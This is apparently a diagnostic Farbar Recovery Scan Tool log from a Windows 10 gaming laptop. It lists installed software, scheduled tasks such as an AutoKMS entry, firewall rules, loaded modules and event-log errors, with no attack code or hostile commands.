Catalyst Control Center Next Localization TR (HKLM\...\{54603A0D-55EB-44D8-0D79-4B7CB94AD6B7}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.40.2.0131 - DT Soft Ltd)
Dell Touchpad (HKLM\...\SynTPDeinstKey) (Version: 19.2.17.45 - Synaptics Incorporated)
Dungeons & Dragons Online® (HKLM\...\Steam App 206480) (Version:  - Standing Stone Games, LLC)
Evolve Stage 2 (HKLM\...\Steam App 273350) (Version:  - Turtle Rock Studios)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 60.0.3112.113 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.5 - Google Inc.) Hidden
Intel® Chipset Device Software (HKLM-x32\...\{61a0f1f5-c77e-4992-ba85-029f93cd8d18}) (Version: 10.1.1.27 - Intel® Corporation) Hidden
Intel® Dynamic Platform and Thermal Framework (HKLM-x32\...\{654EE65D-FAA4-4EA6-8C07-DC94E6A304D4}) (Version: 8.2.10900.330 - Intel Corporation)
Intel® HID Event Filter (HKLM-x32\...\3FB06EEC-013D-4366-9918-71B97DFB84EB) (Version: 1.1.0.313 - Intel Corporation)
Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.5.0.1020 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 21.20.16.4574 - Intel Corporation)
Intel® Serial IO (HKLM\...\{9FD91C5C-44AE-4D9D-85BE-AE52816B0294}) (Version: 30.63.1603.5 - Intel Corporation)
Java 8 Update 144 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180144F0}) (Version: 8.0.1440.1 - Oracle Corporation)
Java SE Development Kit 8 Update 144 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0180144}) (Version: 8.0.1440.1 - Oracle Corporation)
Maxx Audio Installer (x64) (HKLM\...\{307032B2-6AF2-46D7-B933-62438DEB2B9A}) (Version: 2.7.8942.2 - Waves Audio Ltd.) Hidden
Microsoft .NET Framework 1.1 (HKLM-x32\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version: 1.1.4322 - Microsoft)
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1238717651-3256879073-989753507-1001\...\OneDriveSetup.exe) (Version: 17.3.6966.0824 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24123 (HKLM-x32\...\{206898cc-4b41-4d98-ac28-9f9ae57f91fe}) (Version: 14.0.24123.0 - Microsoft Corporation)
Mozilla Firefox 55.0.3 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 55.0.3 (x86 en-US)) (Version: 55.0.3 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 53.0 - Mozilla)
OEM Application Profile (HKLM-x32\...\{B4B7FD8F-06FC-E277-4F29-8F75F8281D8F}) (Version: 1.00.0000 - Advanced Micro Devices, Inc.) Hidden
PlanetSide 2 (HKU\S-1-5-21-1238717651-3256879073-989753507-1001\...\DG0-PlanetSide 2) (Version:  - Sony Online Entertainment)
PX Profile Update (HKLM-x32\...\{92EF4CD3-1423-7E68-2568-14F9D0D8930B}) (Version: 1.00.1. - AMD) Hidden
Qualcomm Atheros 11ac Wireless LAN&Bluetooth Installer (HKLM-x32\...\{E7086B15-806E-4519-A876-DBA9FDDE9A13}) (Version: 11.0.0.10334 - Qualcomm Atheros)
QuickSet64 (HKLM\...\{87CF757E-C1F1-4D22-865C-00C6950B5258}) (Version: 11.1.38 - Dell Inc.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.14393.31228 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7989 - Realtek Semiconductor Corp.)
SecondLifeViewer (HKLM-x32\...\SecondLifeViewer) (Version: 5.0.6.326593 - Linden Research, Inc.)
Synaptics WBF DDK 5111 (VSM) (HKLM\...\{DC5A22ED-3DF4-43F0-BC5F-805DB8E6D7E3}) (Version: 4.5.289.0 - Synaptics)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
Vulkan Run Time Libraries 1.0.26.0 (HKLM\...\VulkanRT1.0.26.0) (Version: 1.0.26.0 - LunarG, Inc.)
Vulkan Run Time Libraries 1.0.33.0 (HKLM\...\VulkanRT1.0.33.0) (Version: 1.0.33.0 - LunarG, Inc.)
Vulkan Run Time Libraries 1.0.51.0 (HKLM\...\VulkanRT1.0.51.0) (Version: 1.0.51.0 - LunarG, Inc.)
WinRAR archiver (HKLM-x32\...\WinRAR archiver) (Version:  - )
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-1238717651-3256879073-989753507-1001_Classes\CLSID\{a9872fee-5a55-4ecb-9b0f-b06fedcf14d1}\localserver32 -> C:\Program Files\Waves\MaxxAudio\MaxxAudioPro.exe (Waves Audio Ltd)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2005-06-08] ()
ContextMenuHandlers4: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2005-06-08] ()
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2017-07-21] (Advanced Micro Devices, Inc.)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> No File
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\Windows\system32\igfxDTCM.dll [2017-08-05] (Intel Corporation)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2005-06-08] ()
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {0427824D-891C-4C2E-B96C-07EE0C9E0E9F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-08-05] (Google Inc.)
Task: {38D5C261-651E-4059-BD66-8BA42A06C34F} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-07-20] (Adobe Systems Incorporated)
Task: {3F6E048D-6404-433B-8F5F-CFF4D89BF89E} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => %windir%\system32\rundll32.exe generaltel.dll,RunTelemetryW
Task: {4C9603C5-CFC2-4883-A798-936E1293795E} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [2017-07-21] (Advanced Micro Devices, Inc.)
Task: {7B5E9FCC-D4DD-4F1C-BFC0-5DAAE963D108} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2017-08-05] ()
Task: {7E485A1A-37CB-4716-9AC3-94A27BEF2313} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-08-05] (Google Inc.)
Task: {9DCE3756-B0D7-44EF-BF3B-AD03523175D5} - System32\Tasks\RtHDVBg_PushButton => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2017-08-05] (Realtek Semiconductor)
Task: {E46F89C4-AAF1-4A8A-8423-FBFA130BCB69} - System32\Tasks\Intel PTT EK Recertification => C:\Program Files\Intel\iCLS Client\IntelPTTEKRecertification.exe [2016-06-15] (Intel® Corporation)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 

==================== Shortcuts & WMI ========================
 
(The entries could be listed to be restored or removed.)
 

==================== Loaded Modules (Whitelisted) ==============
 
2017-08-05 06:47 - 2015-07-15 07:34 - 000032768 _____ () C:\Windows\SYSTEM32\licensemanagerapi.dll
2017-08-12 11:15 - 2017-08-12 11:15 - 000022016 _____ () C:\Windows\System32\xrxs1l6.dll
2017-08-05 08:01 - 2016-10-25 12:45 - 000404480 _____ () C:\Windows\System32\diagtrack_wininternal.dll
2017-08-26 11:04 - 2017-09-01 08:41 - 000103736 _____ () C:\Windows\SysWOW64\PnkBstrB.exe
2017-08-26 11:04 - 2017-09-01 08:40 - 000066872 _____ () C:\Windows\SysWOW64\PnkBstrA.exe
2017-08-05 08:02 - 2017-06-03 19:09 - 002495776 _____ () C:\Windows\system32\CoreUIComponents.dll
2017-08-05 08:00 - 2015-09-17 11:18 - 000429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2017-08-05 08:03 - 2017-04-28 05:14 - 006569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2017-08-05 08:00 - 2016-11-19 11:36 - 000471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-08-05 08:03 - 2017-04-28 05:12 - 001808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2017-08-05 08:03 - 2015-09-17 11:13 - 002274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-09-13 12:13 - 2016-09-13 12:13 - 000014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll
2016-09-13 12:13 - 2016-09-13 12:13 - 000739840 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll
2016-09-13 12:13 - 2016-09-13 12:13 - 000014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll
2016-09-13 12:13 - 2016-09-13 12:13 - 000071168 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll
2016-09-13 12:12 - 2016-09-13 12:12 - 000011776 _____ () C:\Program Files\AMD\CNext\CNext\libEGL.dll
2016-09-13 12:12 - 2016-09-13 12:12 - 002013696 _____ () C:\Program Files\AMD\CNext\CNext\libGLESv2.dll
2016-09-13 12:13 - 2016-09-13 12:13 - 000191488 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Dialogs\dialogplugin.dll
2017-08-05 08:00 - 2016-08-03 10:17 - 000293376 _____ () C:\Windows\SYSTEM32\textinputframework.dll
2016-07-19 03:44 - 2016-07-19 03:44 - 001243936 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 

==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 

==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 

==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
IE trusted site: HKU\.DEFAULT\...\ncode.in -> hxxps://www.ncode.in
IE trusted site: HKU\.DEFAULT\...\ncodesolutions.com -> hxxps://www.ncodesolutions.com
IE trusted site: HKU\.DEFAULT\...\npay.in -> hxxps://www.npay.in
IE trusted site: HKU\.DEFAULT\...\nprocure.com -> hxxps://nprocure.com
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2015-07-10 16:34 - 2015-07-10 16:32 - 000000824 _____ C:\Windows\system32\Drivers\etc\hosts
 

==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1238717651-3256879073-989753507-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Admin\Desktop\IMG_98556.jpg
DNS Servers: 192.168.0.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
HKU\S-1-5-21-1238717651-3256879073-989753507-1001\...\StartupApproved\Run: => "DAEMON Tools Lite"
HKU\S-1-5-21-1238717651-3256879073-989753507-1001\...\StartupApproved\Run: => "OneDrive"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [{17E30FEF-899A-4DF1-B2A2-39DA59CBFF12}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{4E0D7B7E-F8B8-48DA-88C7-9F88F3CDB23E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{248441FB-636A-499F-B72D-BE07F2F0480A}] => (Allow) D:\New folder (2)\New folder\Steam.exe
FirewallRules: [{1FC5FCA6-C33C-4E7C-B115-3DAB4E707048}] => (Allow) D:\New folder (2)\New folder\Steam.exe
FirewallRules: [{FE451A7F-4088-4B53-AD9C-510BBEF3C904}] => (Allow) D:\New folder (2)\New folder\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{45C49214-FE0B-4283-AD9E-ACC950CD35EB}] => (Allow) D:\New folder (2)\New folder\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{480768A8-0C1D-4DBC-AFD4-81606D8F05AA}] => (Allow) D:\New folder (2)\New folder\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{13080431-BD99-4FD1-888E-06EFD7FCFCC2}] => (Allow) D:\New folder (2)\New folder\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [TCP Query User{D2A397EB-6E94-4929-AF02-95C4F6693746}D:\intellij idea community edition 2017.2\bin\idea64.exe] => (Block) D:\intellij idea community edition 2017.2\bin\idea64.exe
FirewallRules: [UDP Query User{7966F533-2A09-4E13-8187-913446497624}D:\intellij idea community edition 2017.2\bin\idea64.exe] => (Block) D:\intellij idea community edition 2017.2\bin\idea64.exe
FirewallRules: [TCP Query User{45619C7F-9637-4AAE-B418-0A75A16D5FBC}D:\cod 4\iw3mp.exe] => (Allow) D:\cod 4\iw3mp.exe
FirewallRules: [UDP Query User{84C1824E-3A98-45A1-BBC5-80407DFC91DB}D:\cod 4\iw3mp.exe] => (Allow) D:\cod 4\iw3mp.exe
FirewallRules: [TCP Query User{C15A1497-41D2-4389-A59E-4E101AF82CA9}D:\cod 4\iw3mp.exe] => (Allow) D:\cod 4\iw3mp.exe
FirewallRules: [UDP Query User{56C8E703-AB34-4B2A-B8A1-C4C5D19A99BD}D:\cod 4\iw3mp.exe] => (Allow) D:\cod 4\iw3mp.exe
FirewallRules: [TCP Query User{D1B620D4-687A-434F-B53F-D7DD84A0A130}D:\cod\cod2mp_s.exe] => (Allow) D:\cod\cod2mp_s.exe
FirewallRules: [UDP Query User{4496A89E-05B5-4679-AD52-8C6B9C385434}D:\cod\cod2mp_s.exe] => (Allow) D:\cod\cod2mp_s.exe
FirewallRules: [TCP Query User{F55D59E6-944D-4463-82F2-A6964C6FE489}D:\new folder (2)\secondlifeviewer\slvoice.exe] => (Allow) D:\new folder (2)\secondlifeviewer\slvoice.exe
FirewallRules: [UDP Query User{CD7B5C33-6C2F-43E2-A8EC-26B35187A733}D:\new folder (2)\secondlifeviewer\slvoice.exe] => (Allow) D:\new folder (2)\secondlifeviewer\slvoice.exe
FirewallRules: [TCP Query User{394E1D49-5796-4621-945F-ACE0277A6931}D:\cod\cod2mp_s.exe] => (Allow) D:\cod\cod2mp_s.exe
FirewallRules: [UDP Query User{6F9A590D-F457-46FC-8C9E-300CD7D649D1}D:\cod\cod2mp_s.exe] => (Allow) D:\cod\cod2mp_s.exe
FirewallRules: [{A8A1B218-3DF7-4351-B46B-36CE14DAF21F}] => (Allow) D:\New folder (2)\New folder\steamapps\common\Black Squad\binaries\win32\SteamLauncher.exe
FirewallRules: [{384209ED-C719-499D-86A9-5F734B60E431}] => (Allow) D:\New folder (2)\New folder\steamapps\common\Black Squad\binaries\win32\SteamLauncher.exe
FirewallRules: [{2E9B1F63-50DD-4854-86E7-07A2CB9BB73E}] => (Allow) C:\Users\Admin\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{6516C458-F5D5-4E3C-ABE9-085B175E0A3F}] => (Allow) C:\Users\Admin\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{FF6252D1-84E0-4F48-B2C6-2D7651E773EA}] => (Allow) D:\New folder (2)\New folder\steamapps\common\Black Squad\binaries\win32\BlackSquadGame.exe
FirewallRules: [{1CBDF46B-00B4-4DAA-B83E-A11364084AB6}] => (Allow) D:\New folder (2)\New folder\steamapps\common\Black Squad\binaries\win32\BlackSquadGame.exe
FirewallRules: [TCP Query User{557A59B8-1B9F-4D0D-BA6D-1FB556335C79}D:\intellij idea community edition 2017.2\bin\idea64.exe] => (Block) D:\intellij idea community edition 2017.2\bin\idea64.exe
FirewallRules: [UDP Query User{D4B4C37A-9F76-4426-AB5B-2D66DD85FAC8}D:\intellij idea community edition 2017.2\bin\idea64.exe] => (Block) D:\intellij idea community edition 2017.2\bin\idea64.exe
FirewallRules: [{5E3BDFE5-B496-4979-B82E-3BC18A0D5DD3}] => (Allow) D:\New folder (2)\New folder\steamapps\common\EvolveGame\bin64_SteamRetail\Evolve.exe
FirewallRules: [{76951B1F-B9D1-4DBC-AFE0-CFFD8234EEF5}] => (Allow) D:\New folder (2)\New folder\steamapps\common\EvolveGame\bin64_SteamRetail\Evolve.exe
FirewallRules: [{5509C818-49DE-4C2A-9D64-79B87350C484}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [TCP Query User{759B86D3-03E9-425A-99BC-416E41974886}D:\new folder (2)\new folder\steamapps\common\cod 4\iw3mp.exe] => (Allow) D:\new folder (2)\new folder\steamapps\common\cod 4\iw3mp.exe
FirewallRules: [UDP Query User{5B590641-FBE0-46BB-B057-11568C6818B4}D:\new folder (2)\new folder\steamapps\common\cod 4\iw3mp.exe] => (Allow) D:\new folder (2)\new folder\steamapps\common\cod 4\iw3mp.exe
FirewallRules: [TCP Query User{8BA05FCF-63B4-423D-B9A8-8C7461ECBCD0}D:\new folder (2)\new folder\steamapps\common\argo\argo_x64.exe] => (Block) D:\new folder (2)\new folder\steamapps\common\argo\argo_x64.exe
FirewallRules: [UDP Query User{5DF0DAF9-5C45-4F77-AF0A-3F7AB2E688FE}D:\new folder (2)\new folder\steamapps\common\argo\argo_x64.exe] => (Block) D:\new folder (2)\new folder\steamapps\common\argo\argo_x64.exe
FirewallRules: [{B5C21A9E-DB11-4F7B-A536-1B8BF9AA34BF}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{5C475647-D5A6-46DD-900C-82F133D9BB58}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{BD967804-A82E-4AAA-8FB6-1ABB2F8DDB12}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{40C62935-BE7C-4539-B3D3-4E2CA03F1ED0}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{4C44E0D2-70F7-48AC-8679-DAB20EEE97DF}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{7D8EC086-C8B0-49C1-9647-F1F5EB4F5486}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{03401570-C2C7-4EB8-AF11-9B81B772D1DA}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{AC0C17EF-8D3C-472C-923D-16336426DDF1}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{10AD4F33-7992-4BCB-9BA8-F945C26DCDD7}] => (Allow) D:\New folder (2)\New folder\steamapps\common\Dungeons and Dragons Online\TurbineInvoker.exe
FirewallRules: [{6C73507C-C233-4426-84DF-D2E6CADADB65}] => (Allow) D:\New folder (2)\New folder\steamapps\common\Dungeons and Dragons Online\TurbineInvoker.exe
FirewallRules: [TCP Query User{0E71304B-21EF-4955-AB00-C51C5F16378C}D:\new folder (2)\new folder\steamapps\common\dungeons and dragons online\dndclient.exe] => (Allow) D:\new folder (2)\new folder\steamapps\common\dungeons and dragons online\dndclient.exe
FirewallRules: [UDP Query User{26E16434-9219-48D7-A23A-4F215922D6D5}D:\new folder (2)\new folder\steamapps\common\dungeons and dragons online\dndclient.exe] => (Allow) D:\new folder (2)\new folder\steamapps\common\dungeons and dragons online\dndclient.exe
FirewallRules: [TCP Query User{C2735E07-FD60-42B0-8796-3759708D0783}D:\new folder (2)\new folder\steamapps\common\dungeons and dragons online\dndclient.exe] => (Block) D:\new folder (2)\new folder\steamapps\common\dungeons and dragons online\dndclient.exe
FirewallRules: [UDP Query User{5D0E937E-6128-45C2-9D39-72F51CD34227}D:\new folder (2)\new folder\steamapps\common\dungeons and dragons online\dndclient.exe] => (Block) D:\new folder (2)\new folder\steamapps\common\dungeons and dragons online\dndclient.exe
FirewallRules: [{6726B215-D9CB-4090-B751-F5237FDED3D3}] => (Allow) D:\New folder (2)\New folder\steamapps\common\Black Squad\binaries\win32\BlackSquadGame.exe
FirewallRules: [{FD1E7932-44B0-4B5B-9EEF-A1712B6AF7F1}] => (Allow) D:\New folder (2)\New folder\steamapps\common\Black Squad\binaries\win32\BlackSquadGame.exe
FirewallRules: [{4EF81584-0681-453A-BA61-72F346867961}] => (Allow) C:\Users\Admin\Desktop\Steam.exe
FirewallRules: [{234BC233-4830-4E04-B880-F9A14E228E2E}] => (Allow) C:\Users\Admin\Desktop\Steam.exe
FirewallRules: [{870F9035-40EC-4828-8616-F6CA4A6F4AA0}] => (Allow) C:\Users\Admin\Desktop\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{493FD20F-9DFE-446F-9E3A-5DE43DF22D9A}] => (Allow) C:\Users\Admin\Desktop\bin\cef\cef.win7\steamwebhelper.exe
 
==================== Restore Points =========================
 

==================== Faulty Device Manager Devices =============
 

==================== Event log errors: =========================
 
Application errors:
==================
Error: (09/20/2017 10:43:05 AM) (Source: DPTF) (EventID: 256) (User: )
Description: Intel® Dynamic Platform and Thermal Framework : ESIF(8.2.11000.2996) TYPE: ERROR MODULE: DPTF TIME 141117683 ms
 
DPTF Build Version:  8.2.11000.2996
DPTF Build Date:  Aug 10 2016 11:44:33
Source File:  ..\..\..\..\Sources\Policies\ConfigTdpPolicy\ConfigTdpPolicy.cpp @ line 152
Executing Function:  ConfigTdpPolicy::onBindDomain
Message:  ConfigTdp not supported.
Participant:  TCPU [0]
Domain:  PKG [0]
Policy:  ConfigTDP Policy [0]
 
Error: (09/20/2017 10:43:05 AM) (Source: DPTF) (EventID: 256) (User: )
Description: Intel® Dynamic Platform and Thermal Framework : ESIF(8.2.11000.2996) TYPE: ERROR MODULE: DPTF TIME 141117678 ms
 
DPTF Build Version:  8.2.11000.2996
DPTF Build Date:  Aug 10 2016 11:44:33
Source File:  ..\..\..\..\Sources\Policies\ConfigTdpPolicy\ConfigTdpPolicy.cpp @ line 330
Executing Function:  ConfigTdpPolicy::synchronizeConfigTdpPlatformSettings
Message:  ConfigTdp not supported.
Policy:  ConfigTDP Policy [0]
 
Error: (09/20/2017 10:14:41 AM) (Source: DPTF) (EventID: 256) (User: )
Description: Intel® Dynamic Platform and Thermal Framework : ESIF(8.2.11000.2996) TYPE: ERROR MODULE: DPTF TIME 139413372 ms
 
DPTF Build Version:  8.2.11000.2996
DPTF Build Date:  Aug 10 2016 11:44:33
Source File:  ..\..\..\..\Sources\Policies\ConfigTdpPolicy\ConfigTdpPolicy.cpp @ line 152
Executing Function:  ConfigTdpPolicy::onBindDomain
Message:  ConfigTdp not supported.
Participant:  TCPU [0]
Domain:  PKG [0]
Policy:  ConfigTDP Policy [0]
 
Error: (09/20/2017 10:14:41 AM) (Source: DPTF) (EventID: 256) (User: )
Description: Intel® Dynamic Platform and Thermal Framework : ESIF(8.2.11000.2996) TYPE: ERROR MODULE: DPTF TIME 139413370 ms
 
DPTF Build Version:  8.2.11000.2996
DPTF Build Date:  Aug 10 2016 11:44:33
Source File:  ..\..\..\..\Sources\Policies\ConfigTdpPolicy\ConfigTdpPolicy.cpp @ line 330
Executing Function:  ConfigTdpPolicy::synchronizeConfigTdpPlatformSettings
Message:  ConfigTdp not supported.
Policy:  ConfigTDP Policy [0]
 
Error: (09/19/2017 08:40:56 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-PL742CC)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (09/19/2017 08:10:36 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-PL742CC)
Description: Activation of app microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (09/19/2017 08:10:36 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-PL742CC)
Description: Activation of app microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (09/19/2017 08:05:05 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: DESKTOP-PL742CC)
Description: microsoft.windows.authhost.a_8wekyb3d8bbwe3
 
Error: (09/19/2017 08:04:52 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: DESKTOP-PL742CC)
Description: microsoft.windows.authhost.a_8wekyb3d8bbwe3
 
Error: (09/19/2017 07:54:02 PM) (Source: DPTF) (EventID: 256) (User: )
Description: Intel® Dynamic Platform and Thermal Framework : ESIF(8.2.11000.2996) TYPE: ERROR MODULE: DPTF TIME 87760621 ms
 
DPTF Build Version:  8.2.11000.2996
DPTF Build Date:  Aug 10 2016 11:44:33
Source File:  ..\..\..\..\Sources\Policies\ConfigTdpPolicy\ConfigTdpPolicy.cpp @ line 152
Executing Function:  ConfigTdpPolicy::onBindDomain
Message:  ConfigTdp not supported.
Participant:  TCPU [0]
Domain:  PKG [0]
Policy:  ConfigTDP Policy [0]
 

System errors:
=============
Error: (09/19/2017 08:40:57 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-PL742CC)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.
 
Error: (09/19/2017 08:40:56 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-PL742CC)
Description: The server CortanaUI.AppXd4tad4d57t4wtdbnnmb8v2xtzym8c1n8.mca did not register with DCOM within the required timeout.
 
